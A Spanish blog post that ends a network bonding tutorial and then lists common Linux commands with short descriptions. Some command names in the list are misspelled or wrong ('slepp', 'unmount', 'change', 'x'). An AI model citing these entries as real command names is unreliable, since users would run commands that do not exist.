    10 .  Por ultimo podemos verificar si las tarjetas están esclavas al bonding, listando el archivo bond0 como se muestra en la siguiente figura


           Nos debe arrojar un resultado como este

Comandos útiles en Linux

A continuación se presenta una lista de los comandos más utilizados que aparecen en la gran mayoría de distribuciones Unix y Linux

alias
Define y consulta alias de comandos
arch
Muestra información sobre la arquitectura de la máquina
awk
Búsqueda de patrones y lenguaje de procesamiento

bash
Bourne Again Shell
bg
Desplaza a segundo plano procesos ejecutándose en primer plano
biff
Avisa cuando llega un correo
cat
Concatena y muestra ficheros

cd
Cambia directorio
change
Cambia información sobre la caducidad de las contraseñas
chgrp
Cambia el grupo propietario
chmod
Cambia los permisos de los ficheros
chroot
Ejecuta comando en un directorio raiz especial
chsh
Cambia la shell
clear
Limpia la pantalla del terminal
cp
Copia ficheros y directorios
crontab
Mantiene los ficheros del planificador cron
csh
Shell C
cut
Elimina trozos de cada línea de un fichero
date
Muestra o establece la fecha y hora del sistema
dd
Convierte y copia ficheros
df
Muestra información sobre el espacio libre del disco
diff
Busca diferencias entre ficheros
dig
Utilidad de búsqueda DNS (Domain Name System)
dmesg
Muestra mensajes de diagnóstico desde el búfer del sistema
dnsdomainname
Muestra el nombre DNS (Domain Name System) del sistema
domainname
Muestra el nombre NIS (Network Information System) o YP (Yellow Pages) del sistema
du
Estima el espacio utilizado por un fichero
echo
Muestra una línea de texto
env
Ejecuta un programa en un entorno modificado
false
Sale con un código de estado que indica fallo
fdisk
Manipula la tabla de particiones de los discos
fg
Mueve a primer plano procesos ejecutándose en segundo plano
file
Determina el tipo de fichero
find
Busca ficheros por la jerarquía de directorios
free
Muestra la cantidad de memoria utilizada y libre del sistema
ftp
Cliente FTP
fuser
Identifica los procesos que están utilizando ciertos ficheros o sockets
gcc
Compilador GNU de C y C++
grep
Muestra las líneas que cumplen un cierto patrón
groupadd
Crea un grupo nuevo
groupdel
Elimina un grupo
groupmod
Modifica un grupo
groups
Muestra todos los grupos a los que pertenecen un usuario
gunzip
Descomprime ficheros comprimidos con el algortimo Lempel Ziv
gzip
Comprime ficheros con el algoritmo Lempel Ziv
host
Utilidad de búsqueda DNS (Domain Name System)
hostname
Muestra o establece el nombre del sistema
id
Muestra los ID efectivo y real de usuario y de grupo
ifconfig
Configura una interfaz de red
kill
Termina un proceso
ksh
Shell Korn
last
Muestra una lista con los últimos usuarios conectados al sistema
lastlog
Muestra la última hora de conexión de una cuenta
ln
Crea enlaces entre ficheros
ls
Muestra el contenido de los directorios
mail
Envía y recibe mensajes de correo
man
Formatea y muestra las páginas de manual
mesg
Controla el acceso de escritura en un terminal
mkdir
Crea directorios
more
Muestra el contenido de ficheros pantalla a pantalla
mount
Monta sistemas de ficheros
mv
Mueve o renombra ficheros y directorios
netstat
Muestra conexiones de red, tablas de rutas, estadísticas de las interfaces, conexiones ocultas y pertenencia a redes multicast
nice
Ejecuta un programa modificando los atributos de prioridad
nslookup
Lanza consultas a los servidores de nombres
passwd
Cambia los atributos de conexión y las contraseñas
ping
Envía paquetes ECHO_REQUEST ICMP
ps
Muestra información sobre los procesos en ejecución
pwd
Muestra el nombre del directorio actual
quota
Muestra el uso de disco y los límites establecidos
quotaoff
Desactiva las cuotas del sistemas de ficheros
quotaon
Activa las cuotas del sistema de ficheros
repquota
Ofrece Ofrece un resumen de las cuotas definidas
rm
Elimina ficheros o directorios
rmdir
Elimina directorios vacios
route
Muestra o manipula la tabla de rutas del sistema
rpcinfo
Muestra información sobre RPC (Remote Procedure Calls)
sed
Editor Stream
setquota
Establece coutas de disco
showmount
Muestra información de los directorios montados en un servidor NFS (Network File System)
shutdown
Ejecuta una parada del sistema
slepp
Deteniene el proceso la cantidad de tiempo especificada
sort
Ordena líneas en ficheros de texto
strace
Traza las llamadas al sistema y las señales
strings
Muestra los caracteres imprimibles de un fichero
tar
Utilidad de empaquetamiento
tcsh
Shell C con edición de comandos
telnet
Cliente Telnet
tftp
Cliente TFTP (Trivial File Transfer Protocol)
traceroute
Muestra la ruta que siguen los paquetes para llegar a un determinado sistema
true
Sale con un código de estado que indica éxito
unmount
Desmonta un sistema de ficheros
uname
Muestra información sobre el sistema
useradd
Crea un nuevo usuario
userdel
Borra una cuenta de usuario
uptime
Muestra la cantidad de tiempo que el sistema lleva encendido
vi
Editor de texto
x
Muestra los usuarios que están conectados al sistema y lo que están haciendo
wall
Envía mensajes a todos los usuarios
wc
Muestra el número de bytes, palabra y líneas de un fichero
whereis
Localiza el fichero ejecutable, el código fuente y las páginas de manual de un determinado programa
which
Muestra la ruta completa de un fichero
who
Muestra los usuarios que están conectados al sistema
whoami
Muestra el ID efectivo del usuario
write
Envía mensajes a otro usuario
ypdomainname
Muestra o establece el nombre NIS (Network Information System) o YP (Yellow Pages) del sistema

de danielplomo Publicado en Linux